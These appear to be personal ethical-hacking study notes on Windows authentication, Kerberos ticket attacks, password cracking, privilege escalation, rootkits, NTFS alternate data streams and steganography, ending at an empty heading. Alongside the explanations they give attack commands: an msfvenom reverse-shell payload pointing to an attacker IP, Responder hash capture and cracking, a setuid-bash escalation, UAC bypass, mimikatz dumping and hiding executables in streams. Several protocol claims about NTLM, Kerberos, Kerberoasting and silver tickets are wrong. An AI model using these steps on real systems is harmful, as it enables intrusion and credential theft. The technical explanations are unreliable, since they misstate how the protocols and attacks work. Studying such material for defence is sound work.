Authentication

Authentication methods are commonly categorized into three types based on the number of factors or elements used to verify a user’s identity. These are often referred to as:

1. Type 1 (Single-factor authentication):

   • Relies on a single element (e.g., password).
   • Basic and less secure.

2. Type 2 (Two-factor authentication or 2FA):

   • Uses two different elements (e.g., password + SMS code).
   • Provides higher security than single-factor.

3. Type 3 (Multi-factor authentication or MFA):

   • Involves three or more elements (e.g., password + fingerprint + security token).
   • Highest level of security among these methods.

Microsoft Authentication Types

Microsoft uses various authentication types within its ecosystem, and three significant ones are SAM database (Security Accounts Manager), NTLM (NT LAN Manager), and Kerberos:

SAM Database (Security Accounts Manager)

• SAM database is a component of the Windows operating system that stores user account information, including usernames and password hashes. This SAM file is present in %SystemRoot%\System32\config folder.
• User authentication is performed against this database by comparing the entered password hash with the stored hash.
• SAM stores these hashes locally on the Windows machine, making it vulnerable to offline attacks if an attacker gains access to the database.

NTLM (NT LAN Manager)

NTLM (NT LAN Manager) and LM (LAN Manager) hashes are formats used to store password hashes in Windows operating systems for authentication purposes. These hashes are derived from the user’s password and are used to validate login credentials.

• LM Hash: This was used in older versions of Windows for password hashing. It breaks the password into two 7-character halves and converts them to uppercase, then generates a hash for each half separately. However, LM Hash is considered weak because it is vulnerable to brute-force attacks and can be easily cracked due to its limitations, such as converting characters to uppercase and breaking the password into two parts.

• NTLM Hash: Introduced as a more secure alternative to LM Hash, NTLM Hash is used in newer versions of Windows. It utilizes a more complex hashing algorithm and doesn’t suffer from the vulnerabilities that plagued LM Hash. NTLM hashes are stronger and more resistant to various cracking techniques.

Because LM Hashes are weaker and susceptible to certain attacks, many modern Windows systems and configurations no longer store LM Hashes by default, opting instead for NTLM or more secure protocols like Kerberos.

NTLM doesn’t have a specific file location like a database file. It’s a protocol used for authentication and is implemented within the Windows operating system. The configuration related to NTLM can be found in the Windows Registry under various keys and settings.

NTLM Authentication Process Explained

NTLM (NT LAN Manager) authentication is a process used by Windows for verifying a user’s identity when logging into a network or system. Here’s a simple breakdown of how it works:

1. User initiates login: When a user tries to log into a Windows system, the system requests authentication to a server.

2. Challenge from the server: The server generates a random number (called a challenge) and sends it to the user’s computer. This challenge is unique for each authentication attempt.

3. Hash calculation: The user’s computer takes this challenge, combines it with the user’s password (which is not sent in plain text), and creates an encrypted version of the challenge using the hashed password.

4. Sending the Encrypted Response: The user’s computer sends back this encrypted response to the server for authentication.

5. Verification by the server: Upon receiving the encrypted response, the server retrieves the stored hash of the user’s password from its database.

6. Decryption and Comparison: The server uses this stored hash to decrypt the received encrypted response. If the decrypted value matches the original challenge sent to the user’s computer, the server knows that the user’s computer has the correct password.

7. Access Granted: If the decrypted response matches the original challenge, the server confirms that the user’s computer possesses the correct password. Access is then granted to the user, allowing them to log in and access the resources or services they were requesting.

This process helps ensure that the user logging in has the correct password without sending the actual password over the network, which enhances security. NTLM authentication, despite being an older protocol, is still used in many Windows environments for authentication purposes.

Hackers can still capture the Hashes and decrypt passwords from it.

Kerberos

• Kerberos is a more advanced and secure authentication protocol used in Windows Active Directory environments.
• It operates based on tickets and a trusted third-party authentication service known as the Key Distribution Center (KDC).
• It uses symmetric key cryptography to authenticate users and provide secure communication over a network.

Kerberos-related information isn’t stored in specific files like a database. Instead, it’s integrated into the Active Directory infrastructure. The Kerberos Key Distribution Center (KDC) service runs on domain controllers, and the Active Directory database (ntds.dit) stores information related to Kerberos tickets and authentication.

Kerberos Authentication Process Explained

Kerberos is an authentication protocol used in computer networks, particularly in Windows environments, to securely authenticate users and services. In Kerberos authentication, the initial step involves the user requesting a ticket from the Authentication Server (AS) to access a specific service. Here’s a deeper dive into that process:

1. User’s Service Request: Let’s say a user wants to access a particular service, like a file server or a printer, on the network.

2. Requesting a Ticket: The user sends a request to the Authentication Server (AS) asking for a ticket that will grant access to the desired service.

3. Authentication Server Verification: The AS authenticates the user’s identity. This verification process typically involves the user providing their credentials, such as a username and password.

   In typical Kerberos implementations, the username and password are not sent in clear text from the user to the Authentication Server (AS). Instead, they are used to generate a cryptographic hash, which is then used in the authentication process.

   Here’s a more detailed explanation:

   • Hashing Process: When a user initially sets their password, the password itself is not transmitted. Instead, it’s used to generate a cryptographic hash. This hash is what’s sent across the network during the authentication process, not the actual password.

   • Authentication Request: When the user requests a TGT from the AS, they send an authentication request. This request contains the username and a hashed form of the user’s password or other credentials. The hash is generated using a one-way function; it cannot be reversed to obtain the original password.

   • Authentication Server Verification: The AS verifies the user’s identity by comparing the received hashed credentials with the stored hashed credentials in its database. If they match, it indicates that the user provided the correct password without transmitting the actual password in plain text over the network.

4. Ticket Granting Ticket (TGT) Creation: Once the user’s identity is confirmed, the AS generates a Ticket Granting Ticket (TGT). This TGT is a special ticket that contains information encrypted using a secret key derived from the user’s password.

5. TGT Issuance: The AS sends the TGT back to the user’s device. This ticket is crucial because it can be used to request access to various services without the need to re-enter the password for each service.

6. Ticket Lifecycle: The TGT typically has a limited validity period to maintain security. Once obtained, the user can use this TGT to request Service Tickets (ST) from the Ticket Granting Server (TGS) for accessing specific services without constantly authenticating with the AS.

Accessing Resources using TGT

Once the user has acquired the Ticket Granting Ticket (TGT) in the Kerberos authentication process, they can use it to request access to specific resources, such as a file server, by following these steps:

1. Service Request: The user, possessing the TGT, wants to access a particular resource or service, like a file server.

2. Ticket Granting Server (TGS) Request: The user sends a request to the Ticket Granting Server (TGS) along with their TGT and a request for a Service Ticket (ST) to access the file server.

3. TGS Verification: The TGS verifies the validity of the TGT presented by the user.

4. Service Ticket (ST) Creation: If the TGT is valid, the TGS creates a Service Ticket (ST) for the requested service (in this case, the file server). The ST contains the user’s identity and is encrypted using a secret key known only to the user and the file server.

5. ST Issuance: The TGS sends the encrypted Service Ticket (ST) back to the user.

6. Accessing the File Server: The user presents the Service Ticket (ST) to the file server while making a request to access specific resources (like files or directories).

7. Service Verification: The file server decrypts the Service Ticket using its secret key. If the decryption is successful and the ticket is valid, the file server grants access to the requested resources.

This process allows the user, possessing a valid TGT, to obtain Service Tickets (STs) for different services within the network without needing to re-enter their credentials (like username and password) for each service. The STs are specific to each service and enable secure communication between the user and the requested resources.

Key Distribution Center(KDC)

The KDC, which consists of the Authentication Server (AS) and Ticket Granting Server (TGS) components in the Kerberos protocol, is an essential part of the domain controller’s functionality in Windows-based networks. The AS and TGS services are responsible for authenticating users and services, issuing tickets, and managing access to resources within the domain.

Therefore, in a Windows domain environment, the domain controller commonly serves as the KDC, handling authentication, ticket generation, and overall security services utilizing the Kerberos protocol. This integration helps centralize user authentication and access control within the domain.

Authentication Server(AS) and Ticket Granting Ticket(TGT)

In a typical Kerberos implementation, the Authentication Server (AS) and the Ticket Granting Ticket (TGT) service are often hosted on the same server. Both services are components of the Kerberos Key Distribution Center (KDC), which comprises two main parts: the Authentication Server (AS) and the Ticket Granting Server (TGS).

The process generally involves:

1. AS: Handles initial authentication, verifying the user’s identity and issuing the TGT.
2. TGS: Manages the granting of service tickets (ST) for specific services once the user has the TGT.

These components can reside on the same physical or logical server or be distributed across multiple servers, depending on the network configuration and security requirements. However, conceptually and functionally, the AS and TGS are integral parts of the Kerberos authentication system.

Golden Ticket Attack: Gaining Unlimited Access

The Golden Ticket attack exploits a vulnerability in certain Kerberos implementations. Kerberos is an authentication protocol used on networks to verify the identity of users and services. In a Golden Ticket attack, an attacker gains access to a special ticket, known as a Golden Ticket, which grants them unlimited access to any resource on the network.

How it works:

• Kerberos Ticket Granting Ticket (TGT) forgery: The attacker steals or forges a TGT, which is a temporary credential used to obtain service tickets.
• Golden Ticket creation: The attacker modifies the TGT to grant themselves unlimited permissions and a long expiration time. This modified TGT is the Golden Ticket.
• Unrestricted access: Using the Golden Ticket, the attacker can impersonate any user and access any resource on the network without further authentication.

Silver Ticket Attack: Lateral Movement

The Silver Ticket attack is similar to the Golden Ticket attack but focuses on lateral movement within a network. Instead of gaining unlimited access, the attacker uses a Silver Ticket to impersonate a specific user with limited privileges. This allows them to move laterally through the network, accessing resources and escalating their privileges gradually.

How it works:

• Kerberos Ticket Granting Ticket (TGT) decryption: The attacker steals or cracks a TGT from a legitimate user.
• Silver Ticket creation: The attacker forges a Service Ticket Granting Ticket (STGT) for a specific service and modifies it to impersonate the legitimate user. This forged STGT is the Silver Ticket.
• Limited access: Using the Silver Ticket, the attacker can access the specific service as the impersonated user, gaining a foothold within the network.

LM hashes are disabled from windows vista and later. In linux /etc/passwd file contains user accounts and /etc/shadow file contains the hashes for the passwords.

Cain password craker utility - Windows GUI for resolving hashes to password.

Password Attack Types

Here is a full list and short description of password attacks as per category:

Default Passwords

Online tools to search default passwords: https://cirt.net , https://www.fortypoundhead.com , https://defaultpassword.us , https://routerpasswords.com , https://default-password.info and lot more…

Active Online Attacks

Trojans/Spyware/Keyloggers - You infect a user’s machine and grab the passwords as the user types in and then attacks the other servers based on the user’s credentials.

Hash Injection/Pass the Hash Attack - Injects a compromised hash into the local session and use that hash to validate network resources.

LLMNR/NBT-NS Poisoning - LLMNR stands for “Link-Local Multicast Name Resolution.” It’s a protocol used in Windows operating systems for resolving the IP addresses of neighboring network devices when the DNS (Domain Name System) resolution fails. LLMNR operates on a local network and allows hosts to resolve the names of neighboring computers without relying on a DNS server. It’s similar to the more common mDNS (Multicast DNS) protocol used in macOS and Linux environments for similar purposes.

LLMNR (Link Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are two main elements of Windows OSes that are used to perform name resolution for hosts present on the same link. These services are enabled by default in Windows OSes and can be used to extract the password hashes from a user. LLMNR is used as a replacement for broadcast in ipv6 networks. netbios over tcp/ip uses broadcast.

Responder is an LLMNR, NBT-NS, and MDNS poisoner. It responds to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix. By default, the tool only responds to a File Server Service request, which is for SMB.

When we want to connect to a share path on network using hostname, the message sent as broadcast on the network. If dns server doesn’t know the answer, it wont resolve to ip. But an attacker can use a software like Responder (in linux), which will provide a fake ip to the requester. In turn this Responder software asks for the user’s username and password hash. Once the attacker has the hash, they can get the password from it using softwares like john the ripper. Responder will create an smb log file with the user’s password hashes in it. Run it with john the ripper: sudo john SMBFILE.txt. Wait for few mins, it will reveal the user’s password. Format: Responder.py -I NetworkInterfaceName Ex: Responder.py -I ens33 or sudo responder -I eth0.

• l0phtcrack - password cracking software for windows GUI.

• Along with exploit-db.com, you can also use other exploit sites such as VulDB (https://vuldb.com), MITRE CVE (https://cve.mitre.org), Vulners (https://vulners.com), and CIRCL CVE Search (https://cve.circl.lu) to find target system vulnerabilities.

AS-REP Roasting is a type of attack that exploits a vulnerability in the Kerberos authentication protocol to steal password hashes of users who have their “Do not require Kerberos pre-authentication” option enabled. This vulnerability allows attackers to impersonate a KDC (Key Distribution Center) and request tickets for users without requiring them to enter their passwords.

Kerberoasting is a more advanced type of attack that uses AS-REP Roasting to steal tickets for service accounts. Service accounts are special accounts that are used by services on a network, and they often have elevated privileges. By stealing tickets for service accounts, attackers can impersonate those services and gain access to sensitive resources on the network.

Wire sniffing typically refers to the practice of intercepting and analyzing data packets transmitted over a computer network. It’s often done using specialized software or hardware tools called packet sniffers or network analyzers. This technique can be used for various purposes, including network troubleshooting, security analysis, and in some cases, malicious activities like eavesdropping on sensitive information.

Rainbow Table:

• What: Precomputed table with hashed passwords and corresponding plaintext passwords.
• Usage: Rapidly matches captured hashes to plaintext passwords in the table.

Comparing Hashes:

• What: Compares captured hashed passwords to a database of known hashes.
• Usage: Quickly identifies plaintext passwords associated with captured hashes.

Easy to Recover Attacks:

• What: Exploits weak hashing or improperly secured hashed passwords.
• Usage: Uses computing power to uncover weak passwords from hashes.

Pwdump7: Pwdump7 is a tool used for retrieving Windows password hashes from the Security Account Manager (SAM) database. It’s commonly utilized by system administrators and security professionals for password auditing and recovery purposes.

• Purpose: Pwdump7 extracts password hashes from the SAM database on a Windows system.
• Functionality: It doesn’t directly reveal the plaintext passwords but extracts hashed representations.
• Usage: Often used by authorized personnel for security audits, password strength assessments, or forensic analysis.

Other password hash tools: mimikatz, powershell empire, DSinternals powershell, ntdsxtract.

Rainbow Crack:

• Purpose: A technique for cracking passwords by using precomputed tables (rainbow tables) to reverse-engineer hashed passwords.
• Functionality: Matches captured hashes against a precomputed table of hash-password pairs to find plaintext passwords.
• Usage: Efficiently breaks hashed passwords, speeding up the decryption process by referencing a precomputed database of hash-password pairs.

Other password cracking tools: John the Ripper password cracker (openwall.com), hashcat - advanced password recovery, thc-hydra, medusa, secure shell bruteforcer.

Password Salting

Password salting is a technique used to enhance the security of hashed passwords by adding a unique and random piece of data (the salt) to each password before hashing. Here’s a concise breakdown:

• Purpose: Enhance security by adding randomness to each hashed password.
• Functionality: Generates a random salt for each password, which is combined with the password before hashing.
• Usage: Mitigates against attacks like rainbow tables by making each hashed password unique, even if the original passwords are the same.

Salting makes it significantly more challenging for attackers to use precomputed tables or rainbow tables because each salted password requires a unique cracking effort, even if two users have the same passwords. This technique significantly improves password security and resistance to various attacks.

Different ways of Exploiting

• Exploit Client-Side Vulnerabilities and Establish a VNC Session: using msfvenom create a reverse_tcp exe file and run it on windows machine. After all options are set run, run vnc option in parrot meterpreter console and it shows the windows machine vnc screen.

• Gain Access to a Remote System using Armitage: GUI for metasploit.

• Gain Access to a Remote System using Ninja Jonin: In the ninja folder, config/constants.json file, setup the remote server hostname and ip. Send the folder to victim. Victim should run the ninja exe file. In jonin, open the exe and it should connect to the victim.

Buffer Overflow

Checkout this article for complete Buffer Overflow detail: Buffer Overflow

Privilege Escalation

Privilege escalation refers to the process of gaining higher levels of access or privileges in a system or network than what an individual or a process originally possessed. Here’s a brief overview:

• Definition: The act of acquiring higher levels of access beyond what is initially granted.
• Types:
  • Vertical Escalation: Elevating privileges to gain higher levels within the same hierarchy (e.g., from a standard user to an administrator).
  • Horizontal Escalation: Acquiring the same level of privilege but in a different context or account (e.g., gaining access to another user’s account with the same level of privilege).
• Causes: Exploiting vulnerabilities, misconfigurations, or weaknesses in software or systems.
• Impact: Allows attackers to perform unauthorized actions, access sensitive data, or execute commands with elevated permissions.

Privilege escalation can occur due to various factors such as insecure configurations, software vulnerabilities, or improper access controls. Preventing privilege escalation involves robust security measures, regular software updates, strong access controls, and least privilege principles to limit user or process permissions to the necessary minimum.

Different ways of Privilege Escalation

• Escalate Privileges using Privilege Escalation Tools and Exploit Client-Side Vulnerabilities: After exploiting the system, run BeRoot.exe software in meterpreter session to elevate normal user privileges to admin.

  • Windows privileges can be used to escalated privileges. These privileges include SeDebug, SeRestore & SeBackup & SeTakeOwnership, SeTcb & SeCreateToken, SeLoadDriver, and SeImpersonate & SeAssignPrimaryToken. BeRoot lists all available privileges and highlights if you have one of these tokens.

  • You can also run GhostPackSeabelt exe on victim’s machine to gather host information and perform security checks to find insecurities in the machine.

• Hack a Windows Machine using Metasploit and Perform Post-Exploitation using Meterpreter: msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=192.168.80.77 -f exe > /home/attacker/Desktop/File.exe - Deploy this exe, and exploit windows victim machine.

• Escalate Privileges by Exploiting Vulnerability in pkexec: Polkit or Policykit is an authorization API used by programs to elevate permissions and run processes as an elevated user.The successful exploitation of the Polkit pkexec vulnerability allows any unprivileged user to gain root privileges on the vulnerable host.

• cve-2021-4034 vulnerability - pwnkit: Local Privilege Escalation Vulnerability

• Escalate Privileges in Linux Machine by Exploiting Misconfigured NFS: Copy /bin/bash file to a not properly configured SMB share, set permission as chmod +s bash and run it. By using ./bash -p it will be elevated to root.

• Escalate Privileges by Bypassing UAC and Exploiting Sticky Keys: use exploit/windows/local/bypassuac_fodhelper and post/windows/manage/sticky_keys to bypass admin account and use the sticky keys on victim machine.

• Escalate Privileges to Gather Hashdump using Mimikatz: after we get control on the machine use kiwi module to load the mimikatz module and then dump kerberos tickets, dump passwords from memory etc.

• Privilege Escalation can also be caused by misconfigured NFS or by Bypassing UAC

• Privilege escalation metasploit: beRoot.exe, seatbelt.exe. Dump hashes: smart_hashdump, bypassuac: bypassuac_fodhelper.

  Seatbelt.exe other parameters list:

  Command	Description
  Seatbelt.exe -group=all	Runs all the commands
  Seatbelt.exe -group=slack	Retrieves information by executing the following commands: SlackDownloads, SlackPresence, SlackWorkspaces
  Seatbelt.exe -group=chromium	Retrieves information by executing the following commands: ChromiumBookmarks, Chromium History, ChromiumPresence
  Seatbelt.exe -group=remote	Run one or more specified commands remotely
  Seatbelt.exe <command> [Command2] ...	Run one or more specified commands
  Seatbelt.exe <command> -full	Retrieves complete results for a command without any filtering
  Seatbelt.exe <command> -computername=COMPUTER.DOMAIN.COM [-username=DOMAIN\USER -password=PASSWORD]	Run one or more specified commands remotely with specified computer name, username, and password
  Seatbelt.exe -group-system- outputfile="C:\Temp\out.txt"	Run system checks and output to a .txt file

Dylib Hijacking

Dynamic Link Library (DLL) hijacking, often referred to as dylib hijacking on macOS systems, is a form of cyber attack that exploits the way applications load dynamic link libraries or shared libraries. These libraries contain reusable code and data that multiple programs can use.

When an application is designed to load a dynamic library without specifying the exact path, it searches in predefined locations (like system folders) to find and load the required library. Attackers can take advantage of this behavior by placing a malicious library with the same name as the one expected by the application in one of these search locations. When the application is launched, it unintentionally loads the malicious library instead of the legitimate one.

Once the malicious library is loaded into the application’s memory space, it can execute arbitrary code, giving attackers control over the application and potentially the system.

Pivoting and Relaying

Pivoting and relaying are techniques used in cybersecurity to move through a network and gain access to external machines or systems. They are often utilized by attackers to escalate their access and compromise more devices within a network.

• Pivoting: This involves using a compromised machine within a network as a stepping stone to access other systems. Once an attacker gains control over one machine, they can use it as a pivot point to launch further attacks against other devices within the same network. It allows attackers to bypass network security measures and move laterally, gaining access to more sensitive or valuable assets.

• Relaying: This technique involves intercepting network communication between two legitimate parties and then relaying or forwarding that communication to another system. For example, an attacker might intercept communication between a user and a server, and then relay that communication to gain unauthorized access to the server or other systems. Techniques like SMB relay attacks take advantage of protocols where authentication credentials are forwarded to gain access to systems.

To defend against these tactics, it’s essential to implement strong network segmentation, robust access controls, and regular security monitoring. Network segmentation helps contain and isolate potential breaches, limiting the impact of a compromised system. Additionally, using encryption and secure authentication methods can prevent attackers from intercepting and relaying sensitive information. Regular security assessments and updates are crucial to identify and patch vulnerabilities that attackers might exploit for pivoting or relaying attacks.

Remote Code Execution Techniques

Remote code execution (RCE) refers to the ability of an attacker to execute arbitrary code or commands on a target system or device remotely, often without authorization. There are various techniques attackers use to achieve RCE, and here are some common methods:

1. Exploiting Vulnerabilities: Attackers search for vulnerabilities in software, operating systems, or applications. When they find a vulnerability (like a buffer overflow or SQL injection), they can craft and send malicious inputs to exploit these weaknesses, gaining control over the system.

2. Remote Exploits: Attackers leverage remote exploits, often in network services or protocols (such as FTP, HTTP, or DNS). These exploits take advantage of vulnerabilities in these services, allowing attackers to execute arbitrary code remotely.

3. Phishing and Social Engineering: Through phishing emails, attackers trick users into clicking on malicious links or downloading attachments containing malware. Once opened, these files exploit vulnerabilities on the user’s system to execute remote code.

4. Command Injection: Insecure applications that allow user input to be directly interpreted as a command can be exploited by attackers. By injecting malicious code through these input fields, attackers can execute commands on the targeted system.

5. Malicious File Upload: Websites or applications that allow file uploads without proper validation can be exploited. Attackers can upload malicious files (such as web shells or scripts) that, when executed on the server, grant them remote access.

6. Code Execution via Remote Access Trojans (RATs): RATs are a type of malware that allows attackers to gain remote access and control over a system. Once installed, they enable the attacker to execute commands or upload and run additional malicious software.

Tools for Executing Applications

Ninja, pupy, pdq deploy, psexec, manageengine desktop central.

Keylogger

A keylogger is a type of software or hardware designed to record keystrokes on a computer or device. It can capture everything a user types, including usernames, passwords, messages, and other sensitive information.

Keyloggers can be:

1. Software-based: Installed discreetly on a system, these programs run in the background, logging keystrokes and sending the recorded data to a remote location or storing it locally for later retrieval.

2. Hardware-based: Physical devices connected between the keyboard and the computer, logging keystrokes as they pass through. These devices can be more challenging to detect but require physical access to the system.

Keyloggers can be used for various purposes:

• Legitimate Uses: They are used by system administrators to monitor computer activity, parental control software for child safety, or by companies to track employee activities for security reasons.

• Malicious Intent: In the wrong hands, keyloggers can be deployed to steal sensitive information, compromise user accounts, perpetrate identity theft, or gather confidential data.

Protecting against keyloggers involves using security measures such as antivirus software, firewalls, regularly updating system software, and being cautious about downloading or installing software from untrusted sources. Additionally, using two-factor authentication can add an extra layer of security by requiring more than just passwords for access to accounts and systems.

Spyware

Spyware refers to malicious software designed to spy on a user’s computer activities without their knowledge or consent. It’s a type of malware that can track and record various activities, including:

1. Keystrokes: Recording keystrokes to capture sensitive information like usernames, passwords, credit card numbers, etc.
2. Browsing Habits: Monitoring browsing activities, visited websites, search queries, and downloads.
3. System Information: Collecting data about the system, hardware, software, and installed applications.
4. Personal Information: Gathering personal data, contacts, emails, or chat conversations.

Spyware often operates silently in the background, hidden from the user, and can transmit the collected data to a remote server or third-party without the user’s consent.

Spyware can be distributed through various means:

• Malicious Websites: Visiting compromised or malicious websites can lead to drive-by downloads, installing spyware without the user’s knowledge.

• Email Attachments: Opening infected email attachments or clicking on malicious links can install spyware onto the system.

• Software Bundling: Some legitimate software might come bundled with spyware, especially if downloaded from untrusted sources.

Being vigilant about security practices and maintaining a proactive approach to cybersecurity is essential to mitigate the risks associated with spyware and other forms of malware.

Spytech spyagent and power spy are windows softwares for spyware. You can also use other spyware tools such as ACTIVTrak (https://activtrak.com), Veriato Cerebral (https://www.veriato.com), NetVizor (https://www.netvizor.net), and SoftActivity Monitor (https://www.softactivity.com) to perform system monitoring and surveillance on the target system.

Rootkit

A rootkit is a type of malicious software designed to gain unauthorized access and control over a computer system while hiding its presence from users and security measures. Rootkits are particularly stealthy and persistent, making them challenging to detect and remove.

Here are some key characteristics of rootkits:

1. Stealth: Rootkits operate stealthily by hiding their presence and activities from users and security software. They often employ advanced techniques to conceal themselves within the operating system, making detection difficult.

2. Privilege Escalation: Once installed, rootkits gain elevated privileges, typically aiming to achieve “root” or administrative access. This level of control allows them to manipulate system files, processes, and settings.

3. Persistence: Rootkits are designed to survive system reboots and remain persistent on the infected machine. They often install themselves deep within the system, making them challenging to remove.

Rootkits can be categorized into two main types based on their operational level:

1. User-mode Rootkits: These operate at the user level and manipulate operating system APIs (Application Programming Interfaces) to conceal their presence. They can hide files, processes, or registry entries from the user and some security software.

2. Kernel-mode Rootkits: These operate at a deeper level within the operating system, known as the kernel. They can intercept system calls, modify core system functions, and directly manipulate memory structures. Kernel-mode rootkits are more challenging to detect and remove as they have higher privileges and access to the core of the operating system.

Detecting and removing rootkits can be complex due to their ability to hide and evade detection. Preventive measures and proactive security practices are crucial:

• Use Reliable Security Software: Employ reputable antivirus and antimalware tools that include rootkit detection and removal capabilities.

• Keep Software Updated: Regularly update operating systems and applications to patch vulnerabilities that rootkits might exploit.

• Network Segmentation and Firewalls: Implement network segmentation and use firewalls to prevent unauthorized access and the spread of rootkits across networks.

• Behavioral Analysis: Employ security solutions that use behavioral analysis to detect suspicious activities indicative of rootkit behavior.

• Safe Practices: Avoid downloading or installing software from untrusted sources and practice safe browsing habits to minimize the risk of encountering rootkits.

Given their complexity and stealthiness, removing rootkits often requires specialized tools and expertise. In severe cases, reinstalling the operating system may be necessary to ensure complete eradication.

You can use softwares like fu.exe to hide processes so that you cant find those processes in task manager. In order to view them you should run memory dump or process explorer or run msinfo32 and goto software environment and system drivers. In this location you should be able to see that process which was hidden.

Different ways in system monitoring and surveillance

• PowerSpy: windows GUI software to record user’s screen, screenshots, websites, documents opened etc

• Spytech SpyAgent: similar to powerspy. You can also use other spyware tools such as ACTIVTrak (https://activtrak.com), Veriato Cerebral (https://www.veriato.com), NetVizor (https://www.netvizor.net), and SoftActivity Monitor (https://www.softactivity.com) to perform system monitoring and surveillance on the target system.

NTFS Streams: Unlocking Hidden Data

NTFS streams are a feature of the NTFS file system used in Windows operating systems. They allow multiple data streams to be associated with a single file.

In a traditional file system, a file has a single stream of data, which is the contents of the file itself. However, NTFS streams allow multiple streams of data to be associated with a file, each identified by a unique name.

The main stream, also known as the “default stream” or “unnamed stream”, is the primary data stream of the file, which contains the file’s contents. Additional streams, also known as “alternate data streams” or “named streams”, can be created and associated with the file. These streams can contain additional data, such as metadata, thumbnails, or other information related to the file.

NTFS streams are not visible in the standard Windows Explorer interface, but they can be accessed and manipulated using various tools and programming interfaces. They are commonly used by Windows operating systems and applications to store additional information about files, such as:

• Summary information (e.g., author, title, comments)
• Thumbnails and previews
• File attributes and permissions
• Application-specific metadata

NTFS streams can also be used by malware and viruses to hide malicious code or data, making them a potential security concern.

It’s worth noting that NTFS streams are specific to the NTFS file system and are not supported by other file systems, such as FAT or HFS+.

There are two main types of NTFS streams:

• Default data stream: This is the main data stream that is accessed when you open a file. It is the stream that you see in File Explorer or other file management applications.
• Alternate data stream (ADS): This is an additional data stream that is associated with a file. ADSs are not visible by default in File Explorer or other file management applications.

Benefits of Using NTFS Streams

NTFS streams offer several benefits:

• Store additional data: You can store any type of data in an ADS, such as metadata, thumbnails, resource forks, or even malware. This can be helpful for applications that need to associate additional information with a file without cluttering the main data stream.

• Enhanced security: By storing sensitive data in an ADS, you can increase the security of your files. Since ADS are hidden by default, they are less likely to be accessed by unauthorized users.

• Improved compatibility: NTFS streams can help maintain compatibility between different platforms. For example, a Mac user could copy files to a Windows server and then back to a Mac without losing the resource stream stored in an ADS.

• Metadata storage: Developers can use streams to store application-specific metadata associated with the file.

• Version control: Different versions of a file can be stored as separate streams, allowing for version rollback.

• Compatibility: NTFS streams were originally introduced to provide compatibility with files from the Macintosh file system, which also uses streams.

Tools for Managing NTFS Streams

Several tools allow you to work with NTFS streams:

• Streams: This command-line tool from Sysinternals allows you to view and manage NTFS streams. You can use it to list the streams associated with a file, read and write data to streams, and even delete streams.

• Resource Hacker: This tool is primarily used for modifying and extracting resources from Windows executables. However, it can also be used to access and modify data stored in NTFS streams.

• AlternateStreamView: This freeware tool provides a user-friendly interface for viewing and managing NTFS streams. It allows you to browse the contents of streams, extract data, and even search for specific streams on your system.

Security Implications of NTFS Streams

While NTFS streams offer several benefits, they also have potential security implications. Since they are hidden by default, malicious actors can use them to hide malware or other harmful content. Additionally, some antivirus programs may not scan ADS by default, leaving them vulnerable to attack.

Here are some tips for using NTFS streams securely:

• Be cautious about what you store in ADS: Only store sensitive information in ADS if necessary.
• Use strong antivirus software: Make sure your antivirus software scans ADS for malware and other threats.
• Disable inheritance for ADS: By default, ADS are inherited by child files and folders. You can disable this behavior to prevent sensitive information from being inadvertently leaked.

NTFS streams offer a powerful and versatile feature for storing additional data with files. While they offer several benefits, it is important to be aware of the potential security risks and take steps to mitigate them. By using NTFS streams responsibly, you can unlock their full potential and enhance your data storage capabilities.

Working with NTFS Streams

There are several ways to work with NTFS streams:

• Command-line tools: The streams and dir /r commands can be used to view and list NTFS streams. WinHex is a software to view NTFS stream data. If a file has three dots in the icon, it means it has some data in a stream. Double click it to view the hidden files.
• Third-party applications: There are many third-party applications that can be used to view, create, and modify NTFS streams.
• Windows APIs: Developers can use the Windows APIs to interact with NTFS streams in their own applications.

NTFS Stream Example

Below commands create an NTFS stream using text files:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21

#open a command prompt and create a new file 
notepad visiblefile.txt

#List contents in the directory
dir 

#Create NTFS Stream. 
#This command will create a hidden file called "hiddenfile"
notepad visiblefile.txt:hiddenfile.txt

#To view the NTFS stream file, run below command
dir /r

# In order to view the hidden file content, in the command prompt type:
notepad visiblefile.txt:hiddenfile.txt

#or create a symbolic link to view the hidden file content.
mklink viewhiddenfile.txt visiblefile.txt:hiddenfile.txt
You can run viewhiddenfile.txt file in command prompt window to view the contents of hiddenfile.txt.

This is because the file isn't available in windows explorer directly to open it. So you should go with command prompt or a sym link.

Now that we know how to create an NTFS stream using text files, let’s look at how to perform the same using exe files.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

#Navigate to a folder (C:\temp) and run below command to create calc.exe application in the folder.
type c:\Windows\System32\calc.exe > .\calc.exe

#Next create a NTFS stream and hide the calc.exe into a text file.
type .\calc.exe > .\file.txt:calc.exe

#In order to run the calc.exe in this location, create a symbolic link
mklink myfile.exe .\file.txt:calc.exe

#Run myfile.exe in the command prompt, which should open calc.exe
# If you double click myfile.exe shortcut link nothing will be opened.
# You can delete the calc.exe in your current folder (C:\temp)

myfile.exe

# In this calc.exe example you have to create a sym link. In the above example, for opening the hidden txt file we have a handler called notepad using which we opened the hidden file. But for opening exe we do not have a separate handler so we have to use a sym link and open it in command prompt.

Steganography

Steganography is the art and science of hiding information within seemingly harmless objects, such as images, audio files, or even text documents. In the context of ethical hacking, steganography can be a powerful tool for both offense and defense.

Steganography is the art and science of hiding information within another object in such a way that the hidden information is not readily detectable. In ethical hacking, steganography can be used for a variety of purposes, such as:

• Hiding sensitive information: Ethical hackers can use steganography to hide sensitive information from unauthorized eyes. For example, they might embed an exploit in an image file in order to bypass security controls.
• Data recovery: Steganography can be used to recover data that has been deleted or encrypted. For example, an ethical hacker might use steganography to recover data from a compromised system.
• Covert communication: Steganography can be used to communicate secretly with other ethical hackers. This can be useful for planning and coordinating attacks.

Offensive Uses of Steganography

• Data Exfiltration: Ethical hackers can use steganography to exfiltrate sensitive data from a target system without raising suspicion. For example, they could embed a confidential document within an image file and then share the image publicly.

• C2 Communication: Steganography can be used to establish covert communication channels between ethical hackers and their tools. This can be useful for bypassing network security controls or for maintaining anonymity.

• Planting Evidence: Ethical hackers can use steganography to plant fake evidence on a target system. This can be used to test the effectiveness of an organization’s security controls or to distract an attacker from the real vulnerabilities.

Defensive Uses of Steganography

